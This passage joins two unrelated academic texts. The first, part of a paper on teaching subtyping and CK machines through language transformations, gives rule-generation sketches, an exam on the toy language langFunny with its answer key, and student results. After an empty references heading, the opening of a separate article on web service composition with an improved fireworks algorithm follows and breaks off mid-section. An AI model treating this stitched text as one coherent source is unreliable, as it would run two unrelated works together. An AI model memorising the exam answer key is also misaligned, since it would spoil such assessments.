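    lhs = f"({op} {' '.join(operands)}), k"
    rhs = f"e, ({op}{i + 1} {' '.join(args)} k)"
    return f"{lhs} -> {rhs}"                  # line 2: the Start rule

# The continuations app1 (focus 0, carries e) and app2 (focus 1, carries v).
app_continuations = [("app", 0, ("e",)), ("app", 1, ("v",))]
```

On `app_continuations`, only $\text{app}_1$ carries no value, so the sketch emits the Start rule of function application.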
Generating Order rules The following pseudo-code generates the reduction rules \texttt{Order}. These rules evaluate the arguments of the operator by jumping from one continuation operator to another in the order established by the evaluation contexts.
\begin{verbatim}
CK-GENERATE-ORDER(Continuations, EvalCtx)
1 for each (op_i t_1 ... t_m k) in Continuations
2   find (op t'_1 ... t'_n) in EvalCtx where (t_k = t'_k or t'_k = E, for all k)
3   if t'_j = E
4     add reduction rule v, (op_i t_1 ... t_m k) -> t_j, (op_j t_1 ... v ... t_m k)
\end{verbatim}
Here, \(v\) appears at position \(i\) in \(op\_j\). After finishing an evaluation in the contexts of the continuation \(op\_i\), we need to find the next continuation operator \(op\_j\). To do so, we find a match between the arguments of the continuation \(op\_i\) with arguments of an evaluation context. This is because arguments that are values in the continuation then need to be values, too, in the next evaluation context. Arguments that are simply expressions \(e\) in the continuation then need to be expressions \(e\), too, in the next evaluation context. The evaluation context will have, however, an argument \(E\) (and only one argument \(E\)) at some position \(j\), which identifies the index of the next continuation operator. The reduction rule that we add starts from a point where a value has been computed, and we are in the context of the continuation \(op\_i\). In one step, we extract the \(j\)-th argument of the continuation \(op\_i\) because that is the expression that now needs to be in the focus of the evaluator. The next continuation is then \(op\_j\), where we placed the value \(v\) just computed among the arguments of \(op\_j\), and specifically at position \(i\).
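The matching described above can be made concrete with a Python sketch of CK-GENERATE-ORDER (same encoding assumptions as before: continuations as triples of operator name, 0-based focus position, and remaining arguments; evaluation contexts with a single "E"):

```python
# Sketch of CK-GENERATE-ORDER. A continuation is (op, i, args); an
# evaluation context is (op, ctx_args) with exactly one "E".

def ck_generate_order(continuations, eval_ctxs):
    rules = []
    for (op, i, args) in continuations:
        full = list(args)
        full.insert(i, "v")                   # slot i has just become a value
        for (op2, ctx) in eval_ctxs:
            if op2 != op or len(ctx) != len(full):
                continue
            j = ctx.index("E")                # candidate next focus position
            if full[j] != "e":                # must still be unevaluated
                continue
            if any(ctx[p] != full[p] for p in range(len(full)) if p != j):
                continue                      # the other arguments must match
            nxt = [full[p] for p in range(len(full)) if p != j]
            rules.append(f"v, ({op}{i + 1} {' '.join(args)} k)"
                         f" -> e, ({op}{j + 1} {' '.join(nxt)} k)")
    return rules

app_continuations = [("app", 0, ("e",)), ("app", 1, ("v",))]
app_ctxs = [("app", ("E", "e")), ("app", ("v", "E"))]
```

On function application, only $\text{app}_1$ has a next context to jump to ($\text{app}_2$ is followed by Computation, not Order), so exactly one Order rule is generated.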
Generating Computation rules is rather straightforward, hence we omit showing that simple procedure.
2.3 Final Exam
At the end of the course, students have been evaluated with a final exam. The final exam included questions about subtyping and CK machine\footnote{The final exam also contained questions about other topics of the course. For example, the final exam of the second iteration contained questions about garbage collection. However, here we focus only on the parts of the exam that concern language transformations.}. The goal is not to test students on the language transformations per se, but rather on their understanding of subtyping and the CK machine. We therefore tested whether students would be able to use their understanding in practice. Our questions tested students on whether,
if presented with a language with unusual operators, they would be able to add subtyping to it, and derive its CK machine.
We have delivered two iterations of the course. The final exam took place online on both iterations due to the COVID-19 pandemic. In the first iteration of the course, we have shared a link to a text file that contained the content of the exam, and students submitted an updated text file via email. In the second iteration, the text of the exam was uploaded in the Blackboard system. Students could insert their answers on the webpage as text, and submit them with the submit button.
The text of the final exam had two parts:
- The description of a toy language called **langFunny**.
- The questions that students were asked to answer, which referred to the language **langFunny**.
Below, we describe these two parts.
### The Toy Language langFunny
The text of the exam contained a description of **langFunny**. The text told the students that **langFunny** is a λ-calculus with pairs ⟨e₁, e₂⟩ and lists [e₁,...,eₙ], equipped with two operators called **doublyApply** and **addToPairAsList**, which we describe below. The text of the exam did not repeat the typing rules and reduction rules of the λ-calculus with pairs and lists because we have seen them extensively in class, and because they did not play a role in the questions of the exam.
On the contrary, the text of the exam provided the students with the formal semantics of **doublyApply** and **addToPairAsList**, which we will show shortly.
Below, we describe the operators **doublyApply** and **addToPairAsList**.
- **doublyApply**: The text of the final exam contained the following description of **doublyApply**.
"**doublyApply** takes two functions f₁ and f₂ in input, and two arguments a₁ and a₂, and creates the pair ⟨f₂(f₁(a₁)), f₁(f₂(a₂))⟩. That is, the first component of the pair calls f₁ with a₁ and passes the result to f₂, and the second component calls f₂ with a₂ and passes the result to f₁."
The text of the exam also provided the students with the following syntax, evaluation contexts, typing rule, and reduction rule for **doublyApply**.
**Expression**
\[
e ::\ldots | (\text{doublyApply } e \ e \ e \ e)
\]
**Evaluation Context**
\[
E ::= \ldots \mid (\text{doublyApply } E\ e\ e\ e) \mid (\text{doublyApply } v\ E\ e\ e) \mid (\text{doublyApply } v\ v\ E\ e) \mid (\text{doublyApply } v\ v\ v\ E)
\]
\[
\frac{\Gamma \vdash e_1 : T_1 \rightarrow T_2 \quad \Gamma \vdash e_2 : T_2 \rightarrow T_1 \quad \Gamma \vdash e_3 : T_1 \quad \Gamma \vdash e_4 : T_2}
     {\Gamma \vdash (\text{doublyApply } e_1\ e_2\ e_3\ e_4) : T_2 \times T_1}
\]
\[
(\text{doublyApply } v_1\ v_2\ v_3\ v_4) \longrightarrow \langle (v_2\ (v_1\ v_3)),\ (v_1\ (v_2\ v_4)) \rangle
\]
- **addToPairAsList**: The text of the exam contained the following description of **addToPairAsList**.
"**addToPairAsList** takes an element a₁ and a pair p, and strives to add the element to the pair. As pairs contain only two elements, it creates a list with three elements: the element a₁, the first component of p, and the second component of p.”
To make a concrete example, we have **addToPairAsList** a₁ ⟨a₂,a₃⟩ = [a₁,a₂,a₃].
---
The text of the exam also provided the students with the following syntax, evaluation contexts, typing rule, and reduction rule for addToPairAsList.
**Expression**
\[
e ::= \ldots \mid (\text{addToPairAsList } e\ e)
\]
**Evaluation Context**
\[
E ::= \ldots \mid (\text{addToPairAsList } E\ e) \mid (\text{addToPairAsList } v\ E)
\]
\[
\frac{\Gamma \vdash e_1 : T \quad \Gamma \vdash e_2 : T \times T}
     {\Gamma \vdash (\text{addToPairAsList } e_1\ e_2) : \text{List } T}
\]
\[
\text{addToPairAsList } v_1\ \langle v_2, v_3 \rangle \longrightarrow [v_1, v_2, v_3]
\]
Although these operators are not extremely bizarre, it is unusual to see them as primitive operations.
Questions and their Challenges After the description of the language \texttt{langFunny}, the text of the exam gave the students three questions that they were asked to answer. We dub these questions “Subtyping of \texttt{doublyApply}”, “Subtyping of \texttt{addToPairAsList}”, and “CK for \texttt{doublyApply}”, respectively.
The question “Subtyping of \texttt{doublyApply}” asked the students to show the version of the typing rule of \texttt{doublyApply} with subtyping. This task is not trivial because the typing rule of \texttt{doublyApply} has three occurrences of $T_1$, and one of them is in contravariant position, which is the input of a function. Therefore, the other two occurrences of $T_1$ must be subtypes of that. The same scenario occurs for $T_2$.
The correct answer to this question is the following:
(The output type of this typing rule is more restrictive than necessary. The output type could be adjusted by applying another procedure, but we have omitted this part).
\[
\Gamma \vdash e_1 : T_1 \rightarrow T_2' \quad \Gamma \vdash e_2 : T_2 \rightarrow T_1' \\
\Gamma \vdash e_3 : T_1'' \quad \Gamma \vdash e_4 : T_2'' \\
T_1' <: T_1 \quad T_1'' <: T_1 \quad T_2' <: T_2 \quad T_2'' <: T_2 \\
\Gamma \vdash (\text{doublyApply } e_1\ e_2\ e_3\ e_4) : T_2 \times T_1
\]
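As a sanity check on the rule, the four subtyping premises can be implemented over a toy lattice. The sketch below is ours: the chain Nat <: Int <: Num and the function `check_doubly_apply` are illustrative, not part of langFunny.

```python
# Hypothetical subtype lattice: Nat <: Int <: Num.
EDGES = {("Nat", "Int"), ("Int", "Num")}

def subtype(s, t):
    """Reflexive-transitive closure of EDGES."""
    return s == t or any(a == s and subtype(b, t) for a, b in EDGES)

def check_doubly_apply(fun1, fun2, t3, t4):
    """fun1 = (T1, T2'), fun2 = (T2, T1'): the argument/result types of
    e1 and e2. Returns the pair type T2 x T1 if the four subtyping
    premises hold, otherwise None."""
    t1, t2p = fun1
    t2, t1p = fun2
    ok = (subtype(t1p, t1) and subtype(t3, t1)       # T1' <: T1, T1'' <: T1
          and subtype(t2p, t2) and subtype(t4, t2))  # T2' <: T2, T2'' <: T2
    return (t2, t1) if ok else None
```

For instance, with e1 : Int → Nat, e2 : Num → Nat, e3 : Nat, and e4 : Int, all premises hold and the checker reports Num × Int.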
The question “Subtyping of \texttt{addToPairAsList}” asked the students to show the typing rule of the operator \texttt{addToPairAsList} with subtyping added. This task is also non-trivial because there are three occurrences of $T$ that are peers. Therefore, the correct solution is to compute a join type.
The correct answer to this question is the following:
\[
\Gamma \vdash e_1 : T' \quad \Gamma \vdash e_2 : T'' \times T''' \\
T = T' \vee T'' \vee T''' \\
\Gamma \vdash (\text{addToPairAsList } e_1\ e_2) : \text{List } T
\]
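The join in this rule is easy to make concrete on a lattice that happens to be a chain, where least upper bounds are just maxima. The following sketch is ours (the chain Nat <: Int <: Num is hypothetical):

```python
# On the chain Nat <: Int <: Num, the join is the maximum.
RANK = {"Nat": 0, "Int": 1, "Num": 2}

def join(*types):
    """Least upper bound on the chain."""
    return max(types, key=RANK.__getitem__)

def type_add_to_pair_as_list(t1, pair_type):
    """From e1 : T' and e2 : T'' x T''', conclude List (T' v T'' v T''')."""
    t2, t3 = pair_type
    return ("List", join(t1, t2, t3))
```

On richer lattices the join may not exist or may require computing a least upper bound explicitly; the chain keeps the example short.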
The question “CK for \texttt{doublyApply}” asked the students to derive the CK machine for \texttt{langFunny} insofar as the reduction rules for \texttt{doublyApply} are concerned. This operator is challenging because it has a high number of arguments (four). To complete the task, students must understand well the relationship between continuations and the evaluation order of arguments.
The correct answer to this question is the following:
\[
\begin{array}{ll}
(\text{doublyApply } e_1\ e_2\ e_3\ e_4),\ k \rightarrow e_1,\ (\text{doublyApply } e_2\ e_3\ e_4\ k) & \text{Start} \\
v_1,\ (\text{doublyApply } e_2\ e_3\ e_4\ k) \rightarrow e_2,\ (\text{doublyApply } v_1\ e_3\ e_4\ k) & \text{Order} \\
v_2,\ (\text{doublyApply } v_1\ e_3\ e_4\ k) \rightarrow e_3,\ (\text{doublyApply } v_1\ v_2\ e_4\ k) & \text{Order} \\
v_3,\ (\text{doublyApply } v_1\ v_2\ e_4\ k) \rightarrow e_4,\ (\text{doublyApply } v_1\ v_2\ v_3\ k) & \text{Order} \\
v_4,\ (\text{doublyApply } v_1\ v_2\ v_3\ k) \rightarrow \langle (v_2\ (v_1\ v_3)),\ (v_1\ (v_2\ v_4)) \rangle,\ k & \text{Computation}
\end{array}
\]
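The machine can be animated directly. The Python sketch below is ours: it drives only the doublyApply rules, represents a continuation frame as a tuple recording the values received so far, and uses plain Python callables as the values v₁ and v₂:

```python
def ck_run(expr):
    """Tiny CK-style evaluator for doublyApply only.
    A control is either ("da", e1, e2, e3, e4) or a plain value;
    continuations are nested frames ending in ("halt",)."""
    control, kont = expr, ("halt",)
    while True:
        if isinstance(control, tuple) and control[0] == "da":
            _, e1, e2, e3, e4 = control               # Start
            control, kont = e1, ("da1", e2, e3, e4, kont)
        elif kont[0] == "da1":                        # Order: got v1
            _, e2, e3, e4, k = kont
            control, kont = e2, ("da2", control, e3, e4, k)
        elif kont[0] == "da2":                        # Order: got v2
            _, v1, e3, e4, k = kont
            control, kont = e3, ("da3", v1, control, e4, k)
        elif kont[0] == "da3":                        # Order: got v3
            _, v1, v2, e4, k = kont
            control, kont = e4, ("da4", v1, v2, control, k)
        elif kont[0] == "da4":                        # Computation: got v4
            _, v1, v2, v3, k = kont
            control, kont = (v2(v1(v3)), v1(v2(control))), k
        elif kont[0] == "halt":
            return control
```

Running `ck_run(("da", str, len, 42, "abc"))` walks through Start, three Order steps, and Computation, mirroring the transitions above.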
The exam could also have asked for the CK reduction rules of \textit{addToPairAsList}. However, that task is slightly simpler than the one for \textit{doublyApply}, so we chose not to ask for those rules.
3 Evaluation
As we have previously said, we have run two iterations of the undergraduate PL course that we have described. To evaluate the merits of our thesis, we have collected information about students’ success with the final exam, and more specifically, with their success in answering the questions “Subtyping of \textit{doublyApply}”, “Subtyping of \textit{addToPairAsList}”, and “CK for \textit{doublyApply}”.
For each question, we have evaluated the answer of each student as “Correct”, “Partially Correct”, “Partially Incorrect”, or “Incorrect/Missing”. Students’ answers were classified as “Correct” only if they matched the solution given in the previous section. Answers were classified as “Incorrect/Missing” if they were missing or completely incorrect. What constitutes a completely incorrect, a partially incorrect, and a partially correct answer is subjective by nature, so we had to draw the line somewhere. Our rationale is the following. A “Partially Correct” answer does not match the solution but shows that the student was on the way towards a correct solution. A “Partially Incorrect” answer contains some elements that demonstrate that the student is applying some correct reasoning principles. A completely incorrect answer (“Incorrect/Missing”) provides no indication that the student is applying correct reasoning principles.
In total, we have conducted the study on 55 students. The rating of students’ answers is shown in the following table.
<table>
<thead>
<tr>
<th></th>
<th>Correct</th>
<th>Partially Correct</th>
<th>Partially Incorrect</th>
<th>Incorrect/Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td>Subtyping of \textit{doublyApply}</td>
<td>15</td>
<td>11</td>
<td>15</td>
<td>14</td>
</tr>
<tr>
<td>Subtyping of \textit{addToPairAsList}</td>
<td>22</td>
<td>10</td>
<td>11</td>
<td>12</td>
</tr>
<tr>
<td>CK for \textit{doublyApply}</td>
<td>18</td>
<td>13</td>
<td>10</td>
<td>14</td>
</tr>
</tbody>
</table>
The question “Subtyping of \textit{doublyApply}” seems to be the most difficult among the three, as shown by the lowest number of completely correct answers. Subtyping of \textit{doublyApply} is indeed a rather complicated task, as it involves contravariance. Furthermore, many type variables are involved, and several of them need to be subtypes of the same variable. It is not surprising that 29 out of 55 did not provide a good answer (and were “Partially Incorrect” or “Incorrect/Missing”). On the contrary, it is rather encouraging to see that 26 out of 55 students could provide a good answer (“Correct” or “Partially Correct”).
The question “Subtyping of addToPairAsList” seems to be the easiest among the three, as the highest number of students could provide a completely correct answer. Students could detect more easily that types are treated as peers in the typing rule of addToPairAsList, and perhaps this signals that this case is simpler to grasp than the contravariant case of doublyApply.
We are surprised by the results of the question “CK for doublyApply”, as such a machine seems rather involved. Regardless, a good number of students (18) provided a completely correct answer, and a high number of them gave a good answer (“Correct” or “Partially Correct”). This indicates that students could grasp the mechanics of the evaluation order and translate it well into a CK machine.
It is reasonable to assume that most students had not been exposed to formal semantics before this very course, and these questions are generally hard for them. It is encouraging to see that a good number of students could provide good answers. It may be an indication that, by and large, students could gain an understanding of subtyping and CK machines. However, we would like to state explicitly that we do not draw any general conclusion from this data.
A Note on Correctness As we have previously said, we do not claim any theoretical results on the correctness of the algorithms that we have taught in class. However, we have implemented them as tools [17] that take as input a language specification written as a textual representation of operational semantics (with syntax similar to that of Ott [20]), and output the modified language specification (in the same textual format). We have applied these tools to several functional languages in order to add subtyping to them and derive their CK machines, and we have confirmed by inspecting the output languages that we have obtained the correct formulations.
3.1 Threats to Validity
The following observations keep this paper from drawing general conclusions about the thesis that language transformations are beneficial in class.
Further Studies While 55 students is a decent number, we would like to conduct more iterations of the same course, and have a larger pool of participants. Once more data has been gathered, we plan to report on it in a journal version of this paper.
Negative Experiments? It would be interesting to run instances of the course with language transformations, and also run instances without language transformations, while keeping the same syllabus and the final exam. The goal is to see whether there is a significant improvement in the success rate of exams in those courses that have used language transformations. However, we find pedagogical issues in implementing this plan. We think that adopting the final exam of Section 2.3 without having taught language transformations may not be a sensible choice. For example, simply covering subtyping with TAPL may not provide students with sufficient knowledge to complete the exam, and we may put unrealistic expectations on students’ ability to generalize and extrapolate general programming languages principles at the undergraduate level.
Perceived Effectiveness? We have made an attempt to evaluate whether students perceived that using language transformations was helpful for their learning. At the end of the course, we have given a survey for them to fill in. The survey contained six statements which, as typical in surveys, required a rating.
For example, to evaluate the task for “Subtyping of doublyApply”, the survey had the statements: “The language transformation algorithm for adding subtyping to languages helped me understand subtyping better”, and “The language transformation algorithm for adding subtyping to languages helped me add subtyping to the language at hand during the exam”. Students could assign a grade among “Strongly Agree”, “Somewhat Agree”, “Neither Agree nor Disagree”, “Somewhat Disagree” or “Strongly Disagree” to the statement. The survey requested students to rate the equivalent statements for “Subtyping of addToPairAsList” and “CK for doublyApply”.
Unfortunately, the survey received no participation. Our courses took place virtually during the COVID-19 pandemic, which may explain the lack of participation.
4 Future Work
In this section, we discuss our plans. Our first goal is to evaluate the perceived effectiveness of language transformations with the survey that we have just described. Hopefully, participation in the survey will improve in the future. Other avenues for future work are the following.
Improving our Current Language Transformations The procedures of Section 2.2 produce CK machines without environments, which is not typical. Our next step is to extend our procedures to capture the full Felleisen and Friedman’s CEK machine. Similarly, we plan on developing language transformations to automatically derive other popular abstract machines such as Landin’s SECD [16] and Krivine’s KAM machines.
The language transformation that we have used for subtyping works only on simple types (sums, products, options, etcetera). We would like to extend the algorithm to also capture constructors that carry maps, such as records and objects. Maps can associate field names to values, and method names to functions. Maps come with their own subtyping properties such as width-subtyping and permutation [19], and we plan on extending our algorithm to cover them. Similarly, we would like to develop language transformations for automatically adding bounded polymorphism [6, 1], recursive subtyping [2], and multiple inheritance and mixins [4, 5] to languages, to name a few examples.
Language Transformations for Other Features Subtyping and abstract machines are not the only features that can be taught in a course in the principles of programming languages. We plan on addressing other features with language transformations, and using them in class.
In teaching the formalism of operational semantics, instructors may begin with a small-step or with a big-step semantics style. Whichever style has been chosen, it could be beneficial to explain the other style with language transformations (in addition to the planned material) that turn small-step into big-step, or big-step into small-step, respectively. Much work has been done to translate one style into the other [9, 11, 12, 13], and we plan on building upon this work. It is worth noting that converting from one style to the other may come with limitations. For example, it may not be possible to derive an equivalent big-step semantics from a small-step semantics formulation when parallelism is involved. The mentioned translation methods are subject to these limitations, and so will be our corresponding language transformations.
We would like to develop a language transformation for automatically generating Milner-style type inference procedures. Also, we would like to devise a language transformation for adding generic types
to languages. Some courses teach dynamic typing and run-time checking in some detail. We would like to explore the idea of automatically generating the dynamic semantics of dynamically typed languages based on a given type system. That is, a language transformation which relies on the type system to inform how the dynamic semantics should be modified in order to perform run-time type checking.
We are not aware of any work that automates the adding of the latter three examples. Developing such language transformations may be challenging research questions on their own.
Advanced Tasks Language transformations may be integrated in graduate level courses, as well. Some of these courses have a research-oriented flavour. In such courses, instructors may assign advanced tasks with language transformations. For example, instructors may ask students to study the work of Danvy et al. [11, 12, 13] to derive reduction semantics. The approach is rather elaborate, and involves techniques such as refocusing and transition compression. Instructors may ask students to develop a series of language transformations that capture this method. Similarly, instructors may ask students to model the language transformation for generating the pretty-big-step semantics from a small-step semantics [3]. Another idea is to target the Gradualizer papers [7, 8], for automatically adding gradual typing to languages.
5 Conclusion
Instructors can integrate language transformations into their undergraduate PL courses. We do not advocate replacing material, but rather using language transformations in addition to the planned material. Our thesis is that language transformations are beneficial for students, helping them deepen their understanding of the PL features being taught. In this paper, we have presented the study that we have conducted and its results. Although we refrain from declaring language transformations unequivocally beneficial, our numbers are encouraging, and we also offer this paper to open a conversation on the topic and to inspire similar studies towards gathering evidence for, or against, our thesis.
Acknowledgements We would like to thank our EXPRESS/SOS 2021 reviewers for their feedback, which helped improve this paper.
References
Research Article
Web Service Composition Optimization with the Improved Fireworks Algorithm
Bo Jiang, Yanbin Qin, Junchen Yang, Hang Li, Liuhai Wang, and Jiale Wang
School of Computer Science and Information Engineering, Zhejiang Gongshang University, Hangzhou 310018, China
Correspondence should be addressed to Bo Jiang; nancybjiang@zjgsu.edu.cn and Jiale Wang; wjl8026@zjgsu.edu.cn
Received 21 October 2021; Revised 20 January 2022; Accepted 1 March 2022; Published 12 March 2022
Abstract
Even though the number of available services keeps increasing, a single service can only complete simple tasks; complex tasks require composing multiple services. To improve the efficiency of web service composition, we propose a service composition approach based on an improved fireworks algorithm (FWA++). First, we use a random selection strategy to keep N−1 individuals for the next generation, which speeds up the convergence of the FWA++ and enhances its search ability. Second, we randomize the total number of sparks and the maximum amplitude of sparks in each generation. In this way, the search ability and the ability to jump out of local optima are dynamically balanced throughout the execution of the algorithm. Our experimental results show that, compared with other existing approaches, the approach proposed in this paper is more efficient and stable.
1. Introduction
With the emergence of a large number of web services, enterprises and individuals can select multiple services to build enterprise applications and software systems through the technology of service composition [1, 2], which is called Service-Oriented Computing (SOC). Service composition is one of the core technologies of SOC, which flexibly aggregates the required resources and realizes service reuse [3]. However, with the convergence of a large number of web services with the same function, quality of service (QoS) has increasingly become an essential factor that needs to be considered in the process of selecting services from these function-equivalent services for composition. Therefore, many QoS-based web service composition methods have been proposed.
Heuristic and metaheuristic algorithms are often used to solve the web service composition problem. Metaheuristic algorithms have the characteristics of good optimization effect and less time consumption. With the attention of researchers at home and abroad, more and more metaheuristic algorithms have been proposed, including particle swarm optimization (PSO) [4], artificial bee colony (ABC) [5], Bacterial Foraging Optimization (BFO) [6], fireworks algorithm (FWA) [7], Fruit Fly Optimization (FOA) [8], Moth Search Algorithm (MSA) [9], Harris Hawks Optimization (HHO) [10], Slime Mould Algorithm (SMA) [11], and Colony Predation Algorithm (CPA) [12].
Among them, different variants of FWA have been proposed to improve the performance of the traditional FWA. Zheng et al. [13] proposed an Enhanced Fireworks Algorithm (EFWA); in their work, four strategies were utilized to improve the original FWA. First, the minimum explosion amplitude parameter was used to avoid the case of 0 amplitude. Second, the generation strategy of explosion sparks was modified to enhance explosion ability. Third, the generation strategy of Gaussian sparks and mapping rules were modified to avoid the degradation of optimization performance caused by the objective function being far from the origin. Fourth, a random selection strategy was adopted to reduce the algorithm’s running time. However, the explosion amplitude is static during the execution of the algorithm, which limits the scope of application of the algorithm. Zheng et al. [14] and Li et al. [15] proposed the Dynamic Search
Fireworks Algorithm (dynFWA) and the Adaptive Fireworks Algorithm (AFWA). The two algorithms were built on the basis of the EFWA algorithm and improved the setting of the explosion amplitude so that it adapts throughout the whole algorithm. Thus, the algorithm can adapt to different optimization objectives and search stages. The IFWA algorithm proposed by Zheng et al. [16] improved on the optimization strategies. The strategy has stronger robustness and applicability by using the optimal fireworks to generate sparks instead of the explosion amplitude adjustment method of dynFWA and AFWA. However, mutating only the optimal fireworks reduces the diversity of the population, and the elite selection strategy draws the fireworks population towards a locally optimal position. Yu et al. [17] proposed another elite strategy based on EFWA: each firework and the sparks it produces are used to calculate a gradient-like vector, which is then used to estimate the convergence point; that point may replace the worst firework individual in the next generation.
In addition to improving the operator, the hybrid FWA combined with other metaheuristic algorithms is also an important research direction. Zheng et al. [18] combined the differential evolution (DE) algorithm with the FWA. A feasible solution is generated by the DE operator to the selected individual. If the fitness value of the feasible solution is better than the original individual, the original solution should be replaced. Zhang et al. [19] introduced the biogeographic optimization algorithm (BBO) into the EFWA to form a new algorithm (BBO-FWA), in which BBO provides an idea of cross-migration of firework individuals according to fitness value, and the lower the fitness value, the higher the probability of cross-migration.
Moreover, FWA has been applied to a wide range of real-world problems. Bolaji et al. [20] used FWA to train the parameters of the feedforward neural network and applied it to the classification problem. Zare et al. [21] introduced two effective cross-generation mutation operators into FWA to solve discrete and multiconstrained problems. Furthermore, this method was applied to solve the problem of multiregional economic dispatch. For more information about the applications of the FWA, please refer to the following literature [22, 23].
Although the above research has improved the FWA’s performance, according to the no free lunch theorem [24], no single metaheuristic algorithm performs well on all types of optimization problems. It is therefore worthwhile to improve the FWA and apply it to new optimization problems. In addition, the balance between the search ability and the ability to jump out of a local optimum in the FWA has not been well resolved. Therefore, we propose the improved fireworks algorithm (FWA++) to solve the optimization problem of service composition. First, we cluster the services with the same function. A WSDL document records a lot of information related to a service, so we extract the service name, port type, messages, documentation, and operations from it and transform them into an embedding. Then, the K-means algorithm is used to cluster the services represented by these embeddings. Second, we improve the original FWA in two respects: (1) the selection strategy in the original FWA requires a lot of computation time, so we randomly keep N−1 individuals for the next generation while preserving the optimization direction, which reduces computation time; (2) to avoid falling into a local optimum while retaining strong search ability, in each generation we randomize the total number of sparks and the maximum amplitude of sparks. Finally, we apply the FWA++ to service composition, and the results show that our algorithm is effective.
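The clustering step can be sketched as follows. The embedding of WSDL fields is out of scope here; we assume services have already been turned into numeric vectors, and hand-roll a minimal K-means (function names are ours, not from the paper):

```python
import random

def kmeans(points, k, iters=20, seed=0):
    """Minimal K-means for clustering service embeddings.
    `points` is a list of equal-length numeric vectors."""
    rng = random.Random(seed)
    centers = rng.sample(points, k)
    clusters = [[] for _ in range(k)]
    for _ in range(iters):
        clusters = [[] for _ in range(k)]
        # Assign each point to its nearest center (squared distance).
        for p in points:
            i = min(range(k), key=lambda j: sum((a - b) ** 2
                    for a, b in zip(p, centers[j])))
            clusters[i].append(p)
        # Move each center to the mean of its cluster.
        for c, members in enumerate(clusters):
            if members:
                centers[c] = [sum(xs) / len(members)
                              for xs in zip(*members)]
    return centers, clusters
```

A production system would use a vetted implementation; this sketch only illustrates where clustering fits in the pipeline.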
Our main contributions are as follows:
(i) In order to speed up the convergence speed of the FWA++, and enhance the local search ability, we use the strategy of random selection to keep individuals for the next generation
(ii) For each generation, randomize the total number of sparks and maximum amplitude of sparks. In this way, the search ability and the ability to jump out of the local optimal solution are dynamically balanced throughout the execution of the algorithm
(iii) We experimented with our approach in a real-world data set which includes 9 QoS attribute values of 2500 real web services. The results show that compared with several existing approaches, the performance of our proposed approach is better
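Contributions (i) and (ii) can be sketched in a few lines. The names below are our own choosing, and the paper's actual operators may differ in detail:

```python
import random

def select_next_generation(population, fitness, n, rng=random):
    """Contribution (i): keep the best individual (preserving the
    optimization direction), then draw n-1 others uniformly at random."""
    best = min(population, key=fitness)   # minimization objective
    rest = [p for p in population if p is not best]
    return [best] + rng.sample(rest, n - 1)

def randomized_explosion_params(max_sparks, max_amplitude, rng=random):
    """Contribution (ii): redraw the total number of sparks and the
    maximum explosion amplitude for each generation."""
    return rng.randint(1, max_sparks), rng.uniform(0.0, max_amplitude)
```

Random selection avoids the distance computations of the original FWA selection, while the per-generation redraw keeps exploration and exploitation in dynamic balance.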
The rest of this paper is organized as follows: Section 2 summarizes the related work of web service composition. Section 3 presents mathematical modeling for the web service composition problem and a diagram to illustrate the process of service composition. Section 4 introduces the framework of approach and design details. Section 5 introduces simulation experiments and performance evaluation. Section 6 reviews and summarizes this paper.
2. Related Work
In this section, we will refer to some literature to describe the related work of service composition. Generally, to solve the optimization problems of service composition, heuristic and metaheuristic algorithms are mainly used. Nevertheless, the metaheuristic algorithms are the essential solution, so we will focus on them in this section.
The heuristic algorithms are constructed through the experience of specific optimization problems [25]. Klein et al. [26] presented a method based on hill climbing to find the best solution. In this method, the search space is limited, so the algorithm’s time complexity is much lower than that of a linear-programming formulation when finding an optimal solution. Liu et al. [27] proposed a service composition method based on a branch constraint execution plan. The algorithm is divided into two stages: in the first stage, the composite service state is transformed into a state transition graph; then, the dynamic process of composite service execution can be analyzed. The second stage uses the web service execution language to find the best solution. Lin et al. [28] presented a relaxable QoS-based service composition approach. In this approach, the optimal solution is subject to local and global
constraints. Although the heuristic algorithm can get an approximate solution in a reasonable time and data scale, the designs of the heuristic algorithms mainly depend on the experience of specific optimization problems, so this limits its scope of application. Moreover, when dealing with the problems of large-scale data, the effect is often not guaranteed.
The metaheuristic algorithms are also approximation algorithms. They are no longer designed for specific optimization problems and have the characteristics of a good optimization effect and less time consumption. Many scholars used metaheuristics to solve service composition problems. Canfora et al. [29] tackled the service composition problem by the genetic algorithm (GA). Although GA is slower than integer programming, it is an effective method to handle service composition optimization. Furthermore, Tang and Ai [30] proposed a hybrid genetic algorithm for the optimal web service composition problem, which performs better than other algorithms. However, when service-oriented applications are complex, GA is not suitable. Ludwig [31] addressed the problem of service composition by introducing particle swarm optimization (PSO). The results show that it performs very well. However, the problem of premature convergence of PSO needs to be solved.
Chandra and Niyogi [32] proposed a modified artificial bee colony (mABC) algorithm. In this algorithm, a chaotic-based learning method is used to initialize the population, and differential evolution (DE) is used to enhance exploitation. mABC has robust scalability and high convergence speed. However, service composition is a discrete optimization problem; mABC may fall into the local optimum. Xu et al. [33] proposed an approach based on artificial bee colony (ABC) algorithms for the service composition problem. In this approach, the author improved the neighborhood search of the ABC algorithm to adapt to the discretization of service composition. At the same time, three algorithms are proposed to maintain the performance and simplicity of the approach. The results show that this approach has high accuracy and avoids local optimization. However, it is time-consuming when this approach replaces multiple component services at the same time.
Li et al. [34] introduced an elite evolutionary strategy (EES). Furthermore, it was applied to HHO to improve the convergence speed and capacity of jumping out of the local optimum. Moreover, a hybrid algorithm that combined EES and HHO was presented. This algorithm has a fast convergence speed and strong robustness. However, this approach may fall into the local optimum because service composition is a discrete optimization problem. Li et al. [35] presented a novel approach CHHO to find an optimal solution by incorporating logical chaotic sequence into the Harris Hawks Optimization (HHO) algorithm. In this approach, the neighborhood relations of concrete services were constructed to form a continuous space, which avoids CHHO falling into the local optimum. Chaotic sequences have ergodic and chaotic features, which help CHHO improve the capacity to jump out of local optimization. In large-scale scenarios, CHHO has less computation time. However, CHHO’s performance will not be good when the QoS attributes are not independent.
3. Problem Statement
Before proposing our approach, we will provide a diagram to illustrate the process of service composition and the mathematical modeling for the web service composition problem.
Figure 1 shows the process of service composition using the integer coding method and the sequential combination pattern. First, input a composite service \( S = \{T_1, T_2, \ldots, T_n\} \). Here, each task corresponds to an abstract service; for example, \( T_1 \) corresponds to abstract service \( S_1 \). Each abstract service has \( m \) concrete services; for example, \( S_i \) has \( m \) concrete services with the same function. Second, select \( n \) concrete services, one from each corresponding abstract service, as a composite service. In theory, there are \( m^n \) possible composite services. Calculate the QoS value of each composite service to find the one that reaches the minimal objective value of Equation (3). Finally, output an optimal composite service.
